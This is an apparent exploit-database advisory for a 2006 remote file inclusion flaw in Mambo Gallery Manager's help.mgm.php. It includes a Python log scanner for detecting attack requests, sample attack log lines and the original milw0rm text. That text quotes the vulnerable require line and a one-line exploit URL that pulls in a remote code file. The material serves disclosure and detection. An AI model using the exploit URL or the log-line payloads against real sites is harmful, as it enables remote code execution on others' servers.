vendor:
Mambo Gallery Manager
by:
A-S-T TEAM
9,3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Mambo Gallery Manager
Affected Version From: v095.r3
Affected Version To: v095.r3
Patch Exists: Yes
Related CWE: N/A
CPE: a:mambo_project:mambo_gallery_manager:0.95.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities

Mambo Gallery Manager v095.r3 is vulnerable to a remote file inclusion vulnerability. This vulnerability is due to a failure in the application to properly sanitize user-supplied input to the 'mosConfig_absolute_path' parameter in the 'help.mgm.php' script. An attacker can exploit this vulnerability to include arbitrary files from remote hosts and execute arbitrary code on the vulnerable system.
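As an added detection example (not part of the original advisory), the following Python scans web server access-log lines for requests that pass a remote URL in the 'mosConfig_absolute_path' parameter, which is the signature of the include described above; the log lines, hosts and paths are constructed for illustration, and the scheme list assumes the PHP wrappers that 'require' will follow when allow_url_include is on.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in combined log format (addresses and paths are made up).
SAMPLE_LOG = """\
203.0.113.7 - - [28/Jul/2006:10:01:12 +0000] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://198.51.100.9/evalcode.txt HTTP/1.1" 200 512
203.0.113.7 - - [28/Jul/2006:10:01:15 +0000] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=HTTP%3A%2F%2F198.51.100.9%2Fevalcode.txt%3F HTTP/1.1" 200 512
192.0.2.20 - - [28/Jul/2006:10:02:01 +0000] "GET /administrator/components/com_mgm/help.mgm.php HTTP/1.1" 200 2048
192.0.2.21 - - [28/Jul/2006:10:02:30 +0000] "GET /index.php?option=com_mgm&mosConfig_absolute_path=/var/www/mambo HTTP/1.1" 200 2048
"""

# Fields we need from a combined-log line: client IP, timestamp, method, request target, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Schemes/wrappers that turn a path include into a remote include (assumed list, not from the advisory).
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:")

# Parameters that should never arrive from the client; the advisory names this one.
WATCHED_PARAMS = {"mosConfig_absolute_path"}


def is_remote_include(value: str) -> bool:
    """True if the parameter value points at a remote/wrapper location.

    Decodes once more to catch double-encoded values and compares case-insensitively,
    since the scheme in a PHP stream wrapper is not case-sensitive.
    """
    decoded = unquote(value).strip().lower()
    return decoded.startswith(REMOTE_SCHEMES)


def scan_log(text: str) -> list:
    """Return one finding per request whose watched parameter carries a remote URL."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line we understand; skip rather than guess
        query = urlsplit(match.group("target")).query
        # parse_qsl already percent-decodes one layer of encoding.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name in WATCHED_PARAMS and is_remote_include(value):
                findings.append({
                    "ip": match.group("ip"),
                    "ts": match.group("ts"),
                    "param": name,
                    "value": unquote(value),
                    "status": match.group("status"),
                })
    return findings
```

A status of 200 on a flagged request, as in the first two sample lines, means the include attempt was served and the host should be treated as compromised until the included file and the installed version are reviewed.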

Mitigation:

Upgrade to the latest version of Mambo Gallery Manager v095.r3 or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

----------------------------------------------------
Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities
----------------------------------------------------
Discovered By A-S-T TEAM
WE ARE CrAsH_oVeR_rIdE & BLACK-CODE & MR-HCR
----------------------------------------------------
site of script: http://mamboxchange.com/frs/?group_id=175&release_id=1289
----------------------------------------------------
Vulnerable: Mambo Gallery Manager v095.r3(mgm)
----------------------------------------------------
vulnerable file :
------------------
help.mgm.php
----------------------------------------------------
vulnerable code:
----------------------------------------------------
require $mosConfig_absolute_path .
"/administrator/components/com_mgm/diagnostics.mgm.php";
$mosConfig_absolute_path File inclusion
----------------------------------------------------
Exploit:
http://www.example.com/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://evalcode.txt
----------------------------------------------------------------------------------------------------
Discovered By A-S-T TEAM
Site: www.lezr.com
Greetz:KING-HACKER,YOUNG_HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,ALMOKAN3,Broken-proxy,troq AND ALL LEZR.COM Member

# milw0rm.com [2006-07-28]